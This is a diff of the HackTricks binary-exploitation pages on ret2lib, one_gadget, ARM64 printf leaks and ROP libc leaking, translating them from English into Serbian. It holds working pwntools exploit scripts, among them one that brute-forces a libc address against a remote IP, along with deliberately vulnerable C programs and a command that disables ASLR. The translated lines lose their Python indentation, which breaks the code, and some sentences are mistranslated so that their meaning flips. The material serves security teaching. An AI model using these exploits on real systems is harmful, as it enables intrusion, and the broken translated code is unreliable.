+Poznavajući korišćenu libc, takođe je moguće koristiti Peda ili GEF da dobijete adresu funkcije **system**, funkcije **exit** i stringa **`/bin/sh`** :
 ```bash
 p system
 p exit
 find "/bin/sh"
 ```
+### Korišćenje /proc/\/maps
 
-### Using /proc/\/maps
+Ako proces kreira **decu** svaki put kada razgovarate s njim (mrežni server), pokušajte da **pročitate** tu datoteku (verovatno će vam biti potrebna root privilegija).
 
-If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root).
-
-Here you can find **exactly where is the libc loaded** inside the process and **where is going to be loaded** for every children of the process.
+Ovde možete pronaći **tačno gde je libc učitan** unutar procesa i **gde će biti učitan** za svaku decu procesa.
 
 ![](<../../../images/image (853).png>)
 
-In this case it is loaded in **0xb75dc000** (This will be the base address of libc)
+U ovom slučaju, učitan je u **0xb75dc000** (Ovo će biti osnovna adresa libc)
 
-## Unknown libc
+## Nepoznata libc
 
-It might be possible that you **don't know the libc the binary is loading** (because it might be located in a server where you don't have any access). In that case you could abuse the vulnerability to **leak some addresses and find which libc** library is being used:
+Može biti moguće da **ne znate koju libc binarni fajl učitava** (jer se možda nalazi na serveru kojem nemate pristup). U tom slučaju, mogli biste iskoristiti ranjivost da **procurite neke adrese i saznate koja libc** biblioteka se koristi:
 
 {{#ref}}
 rop-leaking-libc-address/
 {{#endref}}
 
-And you can find a pwntools template for this in:
+I možete pronaći pwntools šablon za ovo u:
 
 {{#ref}}
 rop-leaking-libc-address/rop-leaking-libc-template.md
 {{#endref}}
 
-### Know libc with 2 offsets
+### Poznavanje libc sa 2 ofseta
 
-Check the page [https://libc.blukat.me/](https://libc.blukat.me/) and use a **couple of addresses** of functions inside the libc to find out the **version used**.
+Proverite stranicu [https://libc.blukat.me/](https://libc.blukat.me/) i koristite **nekoliko adresa** funkcija unutar libc da biste saznali **korisćenu verziju**.
 
-## Bypassing ASLR in 32 bits
+## Obilaženje ASLR na 32 bita
 
-These brute-forcing attacks are **only useful for 32bit systems**.
-
-- If the exploit is local, you can try to brute-force the base address of libc (useful for 32bit systems):
+Ovi napadi brute-force su **samo korisni za 32bitne sisteme**.
 
+- Ako je exploit lokalni, možete pokušati da brute-force-ujete osnovnu adresu libc (korisno za 32bitne sisteme):
 ```python
 for off in range(0xb7000000, 0xb8000000, 0x1000):
 ```
-
-- If attacking a remote server, you could try to **burte-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function.
+- Ako napadate udaljeni server, možete pokušati da **brute-force-ujete adresu `libc` funkcije `usleep`**, prosledjujući kao argument 10 (na primer). Ako u nekom trenutku **serveru treba dodatnih 10s da odgovori**, pronašli ste adresu ove funkcije.
 
 ## One Gadget
 
-Execute a shell just jumping to **one** specific **address** in libc:
+Izvršite shell jednostavno skakanjem na **jednu** specifičnu **adresu** u libc:
 
 {{#ref}}
 one-gadget.md
 {{#endref}}
 
-## x86 Ret2lib Code Example
-
-In this example ASLR brute-force is integrated in the code and the vulnerable binary is loated in a remote server:
+## x86 Ret2lib Primer Koda
 
+U ovom primeru ASLR brute-force je integrisan u kod i ranjivi binarni fajl se nalazi na udaljenom serveru:
 ```python
 from pwn import *
 
@@ -106,60 +93,59 @@ c = remote('192.168.85.181',20002)
 c.recvline()
 
 for off in range(0xb7000000, 0xb8000000, 0x1000):
-    p = ""
-    p += p32(off + 0x0003cb20) #system
-    p += "CCCC" #GARBAGE, could be address of exit()
-    p += p32(off + 0x001388da) #/bin/sh
-    payload = 'A'*0x20010 + p
-    c.send(payload)
-    c.interactive()
+p = ""
+p += p32(off + 0x0003cb20) #system
+p += "CCCC" #GARBAGE, could be address of exit()
+p += p32(off + 0x001388da) #/bin/sh
+payload = 'A'*0x20010 + p
+c.send(payload)
+c.interactive()
 ```
+## x64 Ret2lib Primerak Koda
 
-## x64 Ret2lib Code Example
-
-Check the example from:
+Proverite primer iz:
 
 {{#ref}}
 ../
 {{#endref}}
 
-## ARM64 Ret2lib Example
+## ARM64 Ret2lib Primerak
 
-In the case of ARM64, the ret instruction jumps to whereber the x30 registry is pointing and not where the stack registry is pointing. So it's a bit more complicated.
+U slučaju ARM64, ret instrukcija skače na mesto na koje pokazuje x30 registar, a ne na mesto na koje pokazuje registar steka. Tako da je malo komplikovanije.
 
-Also in ARM64 an instruction does what the instruction does (it's not possible to jump in the middle of instructions and transform them in new ones).
+Takođe, u ARM64, instrukcija radi ono što instrukcija radi (nije moguće skočiti usred instrukcija i transformisati ih u nove).
 
-Check the example from:
+Proverite primer iz:
 
 {{#ref}}
 ret2lib-+-printf-leak-arm64.md
 {{#endref}}
 
-## Ret-into-printf (or puts)
+## Ret-into-printf (ili puts)
 
-This allows to **leak information from the process** by calling `printf`/`puts` with some specific data placed as an argument. For example putting the address of `puts` in the GOT into an execution of `puts` will **leak the address of `puts` in memory**.
+Ovo omogućava **curenje informacija iz procesa** pozivanjem `printf`/`puts` sa nekim specifičnim podacima postavljenim kao argument. Na primer, stavljanje adrese `puts` u GOT prilikom izvršavanja `puts` će **curiti adresu `puts` u memoriji**.
 
 ## Ret2printf
 
-This basically means abusing a **Ret2lib to transform it into a `printf` format strings vulnerability** by using the `ret2lib` to call printf with the values to exploit it (sounds useless but possible):
+Ovo u suštini znači zloupotrebu **Ret2lib da se transformiše u ranjivost format stringova `printf`** korišćenjem `ret2lib` za pozivanje printf sa vrednostima za eksploataciju (zvuči besmisleno, ali je moguće):
 
 {{#ref}}
 ../../format-strings/
 {{#endref}}
 
-## Other Examples & references
+## Ostali Primeri & reference
 
 - [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html)
-  - Ret2lib, given a leak to the address of a function in libc, using one gadget
+- Ret2lib, uz curenje adrese funkcije u libc, koristeći jedan gadget
 - [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
-  - 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')`
+- 64 bita, ASLR omogućeno, ali bez PIE, prvi korak je popuniti preliv do bajta 0x00 kanarija da bi se zatim pozvao puts i curio. Sa kanarijom se kreira ROP gadget za pozivanje puts da curi adresu puts iz GOT-a i ROP gadget za pozivanje `system('/bin/sh')`
 - [https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html)
-  - 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. ROP gadget to call puts to leak the address of puts from the GOT and then call an one gadget.
+- 64 bita, ASLR omogućeno, bez kanarija, preliv steka u main iz funkcije deteta. ROP gadget za pozivanje puts da curi adresu puts iz GOT-a, a zatim poziva jedan gadget.
 - [https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html)
-  - 64 bits, no pie, no canary, no relro, nx. Uses write function to leak the address of write (libc) and calls one gadget.
+- 64 bita, bez pie, bez kanarija, bez relro, nx. Koristi write funkciju da curi adresu write (libc) i poziva jedan gadget.
 - [https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html](https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html)
-  - Uses a format string to leak the canary from the stack and a buffer overflow to calle into system (it's in the GOT) with the address of `/bin/sh`.
+- Koristi format string da curi kanarija iz steka i preliv bafera da pozove system (to je u GOT-u) sa adresom `/bin/sh`.
 - [https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html)
-  - 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check).
+- 32 bita, bez relro, bez kanarija, nx, pie. Zloupotreba lošeg indeksiranja da curi adrese libc i heap-a iz steka. Zloupotreba prelivanja bafera da se uradi ret2lib pozivajući `system('/bin/sh')` (adresa heap-a je potrebna da bi se zaobišla provera).
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md
index 5b24ece5f..d117b5cee 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md
@@ -2,36 +2,32 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne Informacije
 
-[**One Gadget**](https://github.com/david942j/one_gadget) allows to obtain a shell instead of using **system** and **"/bin/sh". One Gadget** will find inside the libc library some way to obtain a shell (`execve("/bin/sh")`) using just one **address**.\
-However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
+[**One Gadget**](https://github.com/david942j/one_gadget) omogućava dobijanje shel-a umesto korišćenja **system** i **"/bin/sh". One Gadget** će pronaći unutar libc biblioteke neki način da dobije shell (`execve("/bin/sh")`) koristeći samo jednu **adresu**.\
+Međutim, obično postoje neka ograničenja, najčešća i lako izbegnuta su kao `[rsp+0x30] == NULL`. Pošto kontrolišete vrednosti unutar **RSP**, samo treba da pošaljete još nekoliko NULL vrednosti kako bi se ograničenje izbeglo.
 
 ![](<../../../images/image (754).png>)
-
 ```python
 ONE_GADGET = libc.address + 0x4526a
 rop2 = base + p64(ONE_GADGET) + "\x00"*100
 ```
-
-To the address indicated by One Gadget you need to **add the base address where `libc`** is loaded.
+Da biste dodali adresu koju je naznačio One Gadget, potrebno je **dodati osnovnu adresu gde je `libc`** učitana.
 
 > [!TIP]
-> One Gadget is a **great help for Arbitrary Write 2 Exec techniques** and might **simplify ROP** **chains** as you only need to call one address (and fulfil the requirements).
+> One Gadget je **velika pomoć za Arbitrary Write 2 Exec tehnike** i može **pojednostaviti ROP** **lance** jer je potrebno pozvati samo jednu adresu (i ispuniti zahteve).
 
 ### ARM64
 
-The github repo mentions that **ARM64 is supported** by the tool, but when running it in the libc of a Kali 2023.3 **it doesn't find any gadget**.
+Github repozitorijum pominje da je **ARM64 podržan** od strane alata, ali kada se pokrene u libc-u Kali 2023.3 **ne pronalazi nijedan gadget**.
 
 ## Angry Gadget
 
-From the [**github repo**](https://github.com/ChrisTheCoolHut/angry_gadget): Inspired by [OneGadget](https://github.com/david942j/one_gadget) this tool is written in python and uses [angr](https://github.com/angr/angr) to test constraints for gadgets executing `execve('/bin/sh', NULL, NULL)`\
-If you've run out gadgets to try from OneGadget, Angry Gadget gives a lot more with complicated constraints to try!
-
+Iz [**github repozitorijuma**](https://github.com/ChrisTheCoolHut/angry_gadget): Inspirisan [OneGadget](https://github.com/david942j/one_gadget), ovaj alat je napisan u python-u i koristi [angr](https://github.com/angr/angr) za testiranje ograničenja za gadgete koji izvršavaju `execve('/bin/sh', NULL, NULL)`\
+Ako ste iscrpeli gadgete koje možete isprobati iz OneGadget, Angry Gadget nudi mnogo više sa komplikovanim ograničenjima za isprobavanje!
 ```bash
 pip install angry_gadget
 
 angry_gadget.py examples/libc6_2.23-0ubuntu10_amd64.so
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
index a9cfca917..e4cf39664 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
@@ -2,65 +2,58 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Ret2lib - NX bypass with ROP (no ASLR)
-
+## Ret2lib - NX zaobilaženje sa ROP (bez ASLR)
 ```c
 #include 
 
 void bof()
 {
-    char buf[100];
-    printf("\nbof>\n");
-    fgets(buf, sizeof(buf)*3, stdin);
+char buf[100];
+printf("\nbof>\n");
+fgets(buf, sizeof(buf)*3, stdin);
 }
 
 void main()
 {
-    printfleak();
-    bof();
+printfleak();
+bof();
 }
 ```
-
-Compile without canary:
-
+Kompajlirati bez kanarinca:
 ```bash
 clang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector
 # Disable aslr
 echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
 ```
-
-### Find offset
+### Pronađi offset
 
 ### x30 offset
 
-Creating a pattern with **`pattern create 200`**, using it, and checking for the offset with **`pattern search $x30`** we can see that the offset is **`108`** (0x6c).
+Kreiranjem obrasca sa **`pattern create 200`**, koristeći ga, i proveravajući offset sa **`pattern search $x30`** možemo videti da je offset **`108`** (0x6c).
 
 

 
-Taking a look to the dissembled main function we can see that we would like to **jump** to the instruction to jump to **`printf`** directly, whose offset from where the binary is loaded is **`0x860`**:
+Pogledom na disassembliranu glavnu funkciju možemo videti da želimo da **skočimo** na instrukciju koja direktno skače na **`printf`**, čiji je offset od mesta gde je binarni fajl učitan **`0x860`**:
 
 

 
-### Find system and `/bin/sh` string
+### Pronađi sistem i `/bin/sh` string
 
-As the ASLR is disabled, the addresses are going to be always the same:
+Pošto je ASLR onemogućen, adrese će uvek biti iste:
 
 

 
-### Find Gadgets
+### Pronađi Gadgets
 
-We need to have in **`x0`** the address to the string **`/bin/sh`** and call **`system`**.
-
-Using rooper an interesting gadget was found:
+Moramo imati u **`x0`** adresu do stringa **`/bin/sh`** i pozvati **`system`**.
 
+Korišćenjem roopera pronađen je zanimljiv gadget:
 ```
 0x000000000006bdf0: ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;
 ```
-
-This gadget will load `x0` from **`$sp + 0x18`** and then load the addresses x29 and x30 form sp and jump to x30. So with this gadget we can **control the first argument and then jump to system**.
+Ovaj uređaj će učitati `x0` iz **`$sp + 0x18`** i zatim učitati adrese x29 i x30 iz sp i skočiti na x30. Tako da sa ovim uređajem možemo **kontrolisati prvi argument i zatim skočiti na system**.
 
 ### Exploit
-
 ```python
 from pwn import *
 from time import sleep
@@ -72,8 +65,8 @@ binsh = next(libc.search(b"/bin/sh")) #Verify with find /bin/sh
 system = libc.sym["system"]
 
 def expl_bof(payload):
-    p.recv()
-    p.sendline(payload)
+p.recv()
+p.sendline(payload)
 
 # Ret2main
 stack_offset = 108
@@ -90,80 +83,72 @@ p.sendline(payload)
 p.interactive()
 p.close()
 ```
-
-## Ret2lib - NX, ASL & PIE bypass with printf leaks from the stack
-
+## Ret2lib - NX, ASL i PIE zaobilaženje sa printf leak-ovima iz steka
 ```c
 #include 
 
 void printfleak()
 {
-    char buf[100];
-    printf("\nPrintf>\n");
-    fgets(buf, sizeof(buf), stdin);
-    printf(buf);
+char buf[100];
+printf("\nPrintf>\n");
+fgets(buf, sizeof(buf), stdin);
+printf(buf);
 }
 
 void bof()
 {
-    char buf[100];
-    printf("\nbof>\n");
-    fgets(buf, sizeof(buf)*3, stdin);
+char buf[100];
+printf("\nbof>\n");
+fgets(buf, sizeof(buf)*3, stdin);
 }
 
 void main()
 {
-    printfleak();
-    bof();
+printfleak();
+bof();
 }
 
 ```
-
-Compile **without canary**:
-
+Kompajlirati **bez kanarinca**:
 ```bash
 clang -o rop rop.c -fno-stack-protector -Wno-format-security
 ```
+### PIE i ASLR ali bez kanarija
 
-### PIE and ASLR but no canary
-
-- Round 1:
-  - Leak of PIE from stack
-  - Abuse bof to go back to main
-- Round 2:
-  - Leak of libc from the stack
-  - ROP: ret2system
+- Runda 1:
+- Leak od PIE sa steka
+- Zloupotreba bof da se vrati u main
+- Runda 2:
+- Leak od libc sa steka
+- ROP: ret2system
 
 ### Printf leaks
 
-Setting a breakpoint before calling printf it's possible to see that there are addresses to return to the binary in the stack and also libc addresses:
+Postavljanjem breakpoint-a pre pozivanja printf, moguće je videti da postoje adrese za povratak u binarni kod na steku, kao i libc adrese:
 
 

 
-Trying different offsets, the **`%21$p`** can leak a binary address (PIE bypass) and **`%25$p`** can leak a libc address:
+Pokušavajući različite ofsete, **`%21$p`** može da otkrije binarnu adresu (PIE bypass) i **`%25$p`** može da otkrije libc adresu:
 
 

 
-Subtracting the libc leaked address with the base address of libc, it's possible to see that the **offset** of the **leaked address from the base is `0x49c40`.**
+Oduzimanjem otkrivene libc adrese od osnovne adrese libc, moguće je videti da je **ofset** otkrivene adrese od osnove `0x49c40`. 
 
-### x30 offset
+### x30 ofset
 
-See the previous example as the bof is the same.
+Pogledajte prethodni primer jer je bof isti.
 
-### Find Gadgets
+### Pronađi Gadgets
 
-Like in the previous example, we need to have in **`x0`** the address to the string **`/bin/sh`** and call **`system`**.
-
-Using rooper another interesting gadget was found:
+Kao u prethodnom primeru, potrebno je imati u **`x0`** adresu do stringa **`/bin/sh`** i pozvati **`system`**.
 
+Korišćenjem roopera pronađen je još jedan zanimljiv gadget:
 ```
 0x0000000000049c40: ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;
 ```
-
-This gadget will load `x0` from **`$sp + 0x78`** and then load the addresses x29 and x30 form sp and jump to x30. So with this gadget we can **control the first argument and then jump to system**.
+Ovaj uređaj će učitati `x0` iz **`$sp + 0x78`** i zatim učitati adrese x29 i x30 iz sp i skočiti na x30. Tako da sa ovim uređajem možemo **kontrolisati prvi argument i zatim skočiti na system**.
 
 ### Exploit
-
 ```python
 from pwn import *
 from time import sleep
@@ -172,15 +157,15 @@ p = process('./rop')  # For local binary
 libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
 
 def leak_printf(payload, is_main_addr=False):
-    p.sendlineafter(b">\n" ,payload)
-    response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
-    if is_main_addr:
-        response = response[:-4] + b"0000"
-    return int(response, 16)
+p.sendlineafter(b">\n" ,payload)
+response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
+if is_main_addr:
+response = response[:-4] + b"0000"
+return int(response, 16)
 
 def expl_bof(payload):
-    p.recv()
-    p.sendline(payload)
+p.recv()
+p.sendline(payload)
 
 # Get main address
 main_address = leak_printf(b"%21$p", True)
@@ -213,5 +198,4 @@ p.sendline(payload)
 
 p.interactive()
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
index fb453a1ba..64ac2786f 100644
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
@@ -1,84 +1,77 @@
-# Leaking libc address with ROP
+# Curjenje libc adrese sa ROP
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Quick Resume
+## Brzi Rezime
 
-1. **Find** overflow **offset**
-2. **Find** `POP_RDI` gadget, `PUTS_PLT` and `MAIN` gadgets
-3. Use previous gadgets lo **leak the memory address** of puts or another libc function and **find the libc version** ([donwload it](https://libc.blukat.me))
-4. With the library, **calculate the ROP and exploit it**
+1. **Pronađi** offset **prelivanja**
+2. **Pronađi** `POP_RDI` gadget, `PUTS_PLT` i `MAIN` gadgete
+3. Iskoristi prethodne gadgete da **curiš adresu u memoriji** funkcije puts ili druge libc funkcije i **pronađi verziju libc** ([preuzmi je](https://libc.blukat.me))
+4. Sa bibliotekom, **izračunaj ROP i iskoristi ga**
 
-## Other tutorials and binaries to practice
+## Ostali tutorijali i binarni fajlovi za vežbanje
 
-This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
-Another useful tutorials: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html)
+Ovaj tutorijal će iskoristiti kod/binarni fajl predložen u ovom tutorijalu: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
+Još korisnih tutorijala: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html)
 
-## Code
-
-Filename: `vuln.c`
+## Kod
 
+Ime fajla: `vuln.c`
 ```c
 #include 
 
 int main() {
-    char buffer[32];
-    puts("Simple ROP.\n");
-    gets(buffer);
+char buffer[32];
+puts("Simple ROP.\n");
+gets(buffer);
 
-    return 0;
+return 0;
 }
 ```
 
 ```bash
 gcc -o vuln vuln.c -fno-stack-protector -no-pie
 ```
+## ROP - Leaking LIBC шаблон
 
-## ROP - Leaking LIBC template
-
-Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script:
+Preuzmite exploit i stavite ga u istu direktoriju kao ranjivi binarni fajl i dajte potrebne podatke skripti:
 
 {{#ref}}
 rop-leaking-libc-template.md
 {{#endref}}
 
-## 1- Finding the offset
-
-The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it (by default `OFFSET = ""`):
+## 1- Pronalaženje ofseta
 
+Šablonu je potreban ofset pre nego što nastavi sa exploitom. Ako je bilo koji ofset obezbeđen, izvršiće potrebni kod da ga pronađe (podrazumevano `OFFSET = ""`):
 ```bash
 ###################
 ### Find offset ###
 ###################
 OFFSET = ""#"A"*72
 if OFFSET == "":
-    gdb.attach(p.pid, "c") #Attach and continue
-    payload = cyclic(1000)
-    print(r.clean())
-    r.sendline(payload)
-    #x/wx $rsp -- Search for bytes that crashed the application
-    #cyclic_find(0x6161616b) # Find the offset of those bytes
-    return
+gdb.attach(p.pid, "c") #Attach and continue
+payload = cyclic(1000)
+print(r.clean())
+r.sendline(payload)
+#x/wx $rsp -- Search for bytes that crashed the application
+#cyclic_find(0x6161616b) # Find the offset of those bytes
+return
 ```
-
-**Execute** `python template.py` a GDB console will be opened with the program being crashed. Inside that **GDB console** execute `x/wx $rsp` to get the **bytes** that were going to overwrite the RIP. Finally get the **offset** using a **python** console:
-
+**Izvršite** `python template.py` u GDB konzoli će se otvoriti program koji se ruši. Unutar te **GDB konzole** izvršite `x/wx $rsp` da dobijete **bajtove** koji će prepisati RIP. Na kraju, dobijte **offset** koristeći **python** konzolu:
 ```python
 from pwn import *
 cyclic_find(0x6161616b)
 ```
-
 ![](<../../../../images/image (1007).png>)
 
-After finding the offset (in this case 40) change the OFFSET variable inside the template using that value.\
+Nakon pronalaženja ofseta (u ovom slučaju 40) promenite OFFSET promenljivu unutar šablona koristeći tu vrednost.\
 `OFFSET = "A" * 40`
 
-Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pattern seach $rsp` from GEF.
+Drugi način bi bio da se koristi: `pattern create 1000` -- _izvršiti do ret_ -- `pattern seach $rsp` iz GEF-a.
 
-## 2- Finding Gadgets
-
-Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**.
+## 2- Pronalaženje Gadžeta
 
+Sada treba da pronađemo ROP gadžete unutar binarnog fajla. Ovi ROP gadžeti će biti korisni za pozivanje `puts` kako bismo pronašli **libc** koja se koristi, a kasnije za **pokretanje konačnog eksploita**.
 ```python
 PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
 MAIN_PLT = elf.symbols['main']
@@ -89,108 +82,98 @@ log.info("Main start: " + hex(MAIN_PLT))
 log.info("Puts plt: " + hex(PUTS_PLT))
 log.info("pop rdi; ret  gadget: " + hex(POP_RDI))
 ```
+`PUTS_PLT` je potreban za pozivanje **funkcije puts**.\
+`MAIN_PLT` je potreban za ponovo pozivanje **main funkcije** nakon jedne interakcije da bi se **iskoristila** prelivanja **ponovo** (beskonačne runde eksploatacije). **Koristi se na kraju svakog ROP-a da ponovo pozove program**.\
+**POP_RDI** je potreban da **prođe** **parametar** u pozvanu funkciju.
 
-The `PUTS_PLT` is needed to call the **function puts**.\
-The `MAIN_PLT` is needed to call the **main function** again after one interaction to **exploit** the overflow **again** (infinite rounds of exploitation). **It is used at the end of each ROP to call the program again**.\
-The **POP_RDI** is needed to **pass** a **parameter** to the called function.
+U ovom koraku ne morate izvršavati ništa jer će sve biti pronađeno od strane pwntools tokom izvršenja.
 
-In this step you don't need to execute anything as everything will be found by pwntools during the execution.
-
-## 3- Finding libc library
-
-Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address.
+## 3- Pronalaženje libc biblioteke
 
+Sada je vreme da pronađemo koja verzija **libc** biblioteke se koristi. Da bismo to uradili, iskoristićemo **leak** **adresu** u memoriji **funkcije** `puts` i zatim ćemo **pretražiti** u kojoj **verziji biblioteke** se nalazi verzija puts na toj adresi.
 ```python
 def get_addr(func_name):
-    FUNC_GOT = elf.got[func_name]
-    log.info(func_name + " GOT @ " + hex(FUNC_GOT))
-    # Create rop chain
-    rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
+FUNC_GOT = elf.got[func_name]
+log.info(func_name + " GOT @ " + hex(FUNC_GOT))
+# Create rop chain
+rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
 
-    #Send our rop-chain payload
-    #p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
-    print(p.clean()) # clean socket buffer (read all and print)
-    p.sendline(rop1)
+#Send our rop-chain payload
+#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
+print(p.clean()) # clean socket buffer (read all and print)
+p.sendline(rop1)
 
-    #Parse leaked address
-    recieved = p.recvline().strip()
-    leak = u64(recieved.ljust(8, "\x00"))
-    log.info("Leaked libc address,  "+func_name+": "+ hex(leak))
-    #If not libc yet, stop here
-    if libc != "":
-        libc.address = leak - libc.symbols[func_name] #Save libc base
-        log.info("libc base @ %s" % hex(libc.address))
+#Parse leaked address
+recieved = p.recvline().strip()
+leak = u64(recieved.ljust(8, "\x00"))
+log.info("Leaked libc address,  "+func_name+": "+ hex(leak))
+#If not libc yet, stop here
+if libc != "":
+libc.address = leak - libc.symbols[func_name] #Save libc base
+log.info("libc base @ %s" % hex(libc.address))
 
-    return hex(leak)
+return hex(leak)
 
 get_addr("puts") #Search for puts address in memmory to obtains libc base
 if libc == "":
-    print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
-    p.interactive()
+print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
+p.interactive()
 ```
-
-To do so, the most important line of the executed code is:
-
+Da bi to uradili, najvažnija linija izvršenog koda je:
 ```python
 rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
 ```
+Ovo će poslati neke bajtove dok **prepisivanje** **RIP** nije moguće: `OFFSET`.\
+Zatim, postaviće se **adresa** gadgeta `POP_RDI` tako da će sledeća adresa (`FUNC_GOT`) biti sačuvana u registru **RDI**. To je zato što želimo da **pozovemo puts** **proslavljajući** mu **adresu** `PUTS_GOT` jer je adresa u memoriji funkcije puts sačuvana u adresi na koju pokazuje `PUTS_GOT`.\
+Nakon toga, biće pozvan `PUTS_PLT` (sa `PUTS_GOT` unutar **RDI**) tako da će puts **pročitati sadržaj** unutar `PUTS_GOT` (**adresa funkcije puts u memoriji**) i **odštampati** ga.\
+Na kraju, **glavna funkcija se ponovo poziva** kako bismo mogli ponovo iskoristiti prelivanje.
 
-This will send some bytes util **overwriting** the **RIP** is possible: `OFFSET`.\
-Then, it will set the **address** of the gadget `POP_RDI` so the next address (`FUNC_GOT`) will be saved in the **RDI** registry. This is because we want to **call puts** **passing** it the **address** of the `PUTS_GOT`as the address in memory of puts function is saved in the address pointing by `PUTS_GOT`.\
-After that, `PUTS_PLT` will be called (with `PUTS_GOT` inside the **RDI**) so puts will **read the content** inside `PUTS_GOT` (**the address of puts function in memory**) and will **print it out**.\
-Finally, **main function is called again** so we can exploit the overflow again.
-
-This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** (which is inside **libc** library). Now that we have that address we can **search which libc version is being used**.
+Na ovaj način smo **prevarili funkciju puts** da **odštampa** **adresu** u **memoriji** funkcije **puts** (koja se nalazi u **libc** biblioteci). Sada kada imamo tu adresu možemo **pretražiti koja verzija libc se koristi**.
 
 ![](<../../../../images/image (1049).png>)
 
-As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\
-But, in a remote exploit case I will explain here how can you find it:
+Pošto **iskorišćavamo** neki **lokalni** binarni fajl, **nije potrebno** da otkrijemo koja verzija **libc** se koristi (samo pronađite biblioteku u `/lib/x86_64-linux-gnu/libc.so.6`).\
+Ali, u slučaju udaljenog eksploata, objasniću ovde kako možete to da pronađete:
 
-### 3.1- Searching for libc version (1)
+### 3.1- Pretraživanje verzije libc (1)
 
-You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me)\
-It will also allow you to download the discovered version of **libc**
